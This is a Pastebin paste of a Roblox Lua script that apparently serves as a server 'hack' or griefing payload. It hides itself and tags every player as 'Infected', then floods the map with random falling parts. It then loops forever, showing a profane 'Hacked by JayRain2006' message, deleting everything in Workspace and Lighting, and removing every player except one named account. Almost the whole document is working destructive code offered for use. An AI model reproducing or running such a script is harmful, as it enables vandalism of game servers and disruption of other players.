Advertisement
JayRain

script

Mar 18th, 2018
137
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.70 KB | None | 0 0
  1. script.Parent = nil --Made by Speedhax4r
  2. Play = game.Players:GetPlayers()
  3. for i=1,#Play do
  4. if Play[i]:FindFirstChild("leaderstats") then
  5. Play[i].leaderstats:remove()
  6. end
  7. local stats = Instance.new("IntValue",Play[i])
  8. stats.Name = "leaderstats"
  9. local hack = Instance.new("StringValue",stats)
  10. hack.Name = "Speedhax4r recreated Infected script!"
  11. hack.Value = "Infected"
  12. local You = Play[i].Name
  13. local head = workspace[You].Head:Clone()
  14. workspace[You].Head.Transparency = 1
  15. local model = Instance.new("Model",workspace)
  16. local humanoid = Instance.new("Humanoid",model)
  17. head.Parent = model model.Name = "Infected"
  18. humanoid.MaxHealth = 0
  19. local w = Instance.new("Weld",model)
  20. w.Part0,w.Part1 = workspace[You].Head,head
  21. end
  22. for i=1,30 do
  23. i = i + 10
  24. wait(0.1)
  25. local p = Instance.new("Part")
  26. p.Parent = game.Workspace
  27. p.Position = Vector3.new ((math.random(-100, 100)),130,(math.random(0,100)))
  28. p.Size = Vector3.new( math.random(50,100), math.random(50,100), math.random(50,100))
  29. p.BrickColor = BrickColor.new(math.random(1,100))
  30. p.Transparency= .2
  31. p.Reflectance= .1
  32. p.Shape = math.random(0,2)
  33. p.Locked = true
  34. p.Anchored = false
  35. p.CanCollide = true
  36. end
  37. while true do
  38. abm = Instance.new("Message",workspace)
  39. abm.Text = "Hacked by JayRain2006 Mother fuckers!"
  40. wait(5)
  41. pcall(function() abm:Destroy() end)
  42. for i,v in pairs(game:GetService("Workspace"):GetChildren()) do
  43. pcall(function() v:Destroy() end)
  44. end
  45. pcall(function() game:GetService("Lighting"):ClearAllChildren() end)
  46. pls = game:GetService("Players"):GetChildren()
  47. if #pls > 0 then
  48. for X=1, #pls do
  49. if pls[X].Name ~= "1x1x1" then
  50. pcall(function() pls[X]:Destroy() end)
  51. end
  52. end
  53. end
  54. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement